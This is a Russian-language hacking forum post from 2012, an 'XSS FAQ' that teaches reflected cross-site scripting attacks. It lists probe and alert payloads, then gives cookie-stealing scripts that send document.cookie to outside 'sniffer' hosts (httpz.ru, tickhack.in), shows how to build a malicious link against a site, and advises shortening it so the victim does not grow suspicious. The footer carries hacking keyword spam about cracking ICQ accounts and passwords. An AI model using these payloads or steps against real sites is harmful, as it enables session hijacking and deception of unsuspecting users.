Старый 10.04.2012, 15:50   #1
whitehack
RAM 32MB
 
Аватар для whitehack
 
Регистрация: 09.04.2012
Сообщений: 44
whitehack Новичок
whitehack вне форума

По умолчанию XSS - FAQ


Привет всем я хотел сделать небольшой FAQ по xss ну что начнем
1.Что такое XSS ?
Цитата:
XSS - Cross Ste Scripting (CSS уже занято Cascade Style Sheets). Уязвимость, возникающая вследствии недостаточной фильтрации вводимых пользователями и в дальнейшем отображаемых на страницах сайта данных. Позволяет разместить непосредственно на страницах сайта произвольный html-код (соответственно, код будет выполняться у всех пользователей, зашедших на страницу).
2.Проверка на уязвимость :
В поиске напишите <fuck> и в исходники поищите слово fuck если "<>" остались это значит то что сайт уязвим если они заменились на что то типа такого
Код:
&lt;fuck&gt;
то это значит искать xss без полезно но если "<>" остались то можете с улыбкой вбивать ваш скрипт я тут написал чуть-чуть :smile3:
Цитата:
<script>alert()</script>
"><script>alert()</script>
'><''>"><script>alert(/XSS/)</script>
<script>alert('xss')</script>
<script>alert('A');</script>
"><sсriрt>alert(document .cookie)</sсriрt>
Написали ? вышло окно? если да то переходим к 3 шагу.
3.Эксплуатирование XSS :
Эксплуатировать xss вы можете с любого сниффера например [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.] [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.] заходим на сниффер нам нужно будет взять оттуда код для кражи cookies , что такое cookies ? :
Цитата:
Ку́ки (слово не склоняется; от англ. cookie — печенье) — небольшой фрагмент данных, созданный веб-сервером или веб-страницей и хранимый на компьютере пользователя в виде файла, который веб-клиент (обычно веб-браузер) каждый раз пересылает веб-серверу в HTTP-запросе при попытке открыть страницу соответствующего сайта. Применяется для сохранения данных на стороне пользователя, на практике обычно используется для:
аутентификации пользователя;
хранения персональных предпочтений и настроек пользователя;
отслеживания состояния сессии доступа пользователя;
ведения статистики о пользователях.
Приём куки обозревателями (браузерами) требуют многие сайты с ограничениями доступа, большинство интернет-магазинов.[1] Настройка оформления и поведения многих веб-сайтов по индивидуальным предпочтениям пользователя тоже основана на куки.[2]
С момента своего появления куки вызывали обеспокоенность пользователей Интернета, поскольку слежение за действиями и предпочтениями пользователей может подвергнуть опасности тайну личной жизни. Как результат, в Европейском союзе, Соединённых Штатах, и в других странах были приняты соответствующие законы, регулирующие применение куки[источник не указан 828 дней]. С другой стороны, куки подвергаются критике[кем?] также потому, что они не всегда точно идентифицируют пользователей, а это может повлечь атаки злоумышленников.
Имеется и ряд заблуждений о куки. Они главным образом основаны на уверенности людей, что куки являются компьютерными программами. На самом деле, куки — это простые текстовые данные, и они не могут выполнять какие-либо действия самостоятельно. В частности, куки не могут быть ни вирусами, ни шпионскими программами.
Большинство современных браузеров позволяют пользователям выбрать — принимать куки или нет, но их отключение делает невозможной работу с некоторыми сайтами.
Взяли код ? он может выглядит вот так :
Код:
%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js></SCRIPT>"
или так :
Код:
<script>img = new Image(); img.src = "tickhack.in/images/tickhack_1.gif?"+document.cookie;</script>
эти коды взяты со снифферов hacker-pro.net и tickhack.in
например у нас получилась такая ссылка
http://site.ru/news="><script>alert('xss')</script> нам надо вставить скрипт для пассивной xss атаки после знака "> и если сайт оставляет куки то куки придут на ваш сниффер вставили? и у нас получится вот такая ссылка
Код:
http://site.ru/news=">%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js></SCRIPT>"
теперь переходим к следующему пункту
4.Шифрование длинных ссылок :
Согласитесь если такую ссылку дать жертве то она заподозрит что тo и мы должны сделать её короткой мы можем зашифровать её с помощью сервиса [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.] и отправлять жертве и если она перейдет по ссылке то на наш сниффер придут её куки конечно же если сайт оставляет куки) ну что на всё если есть какие нибудь ошибки в тексте сильно не ругайте
Автор :[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Последний раз редактировалось whitehack; 28.09.2012 в 15:49.
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot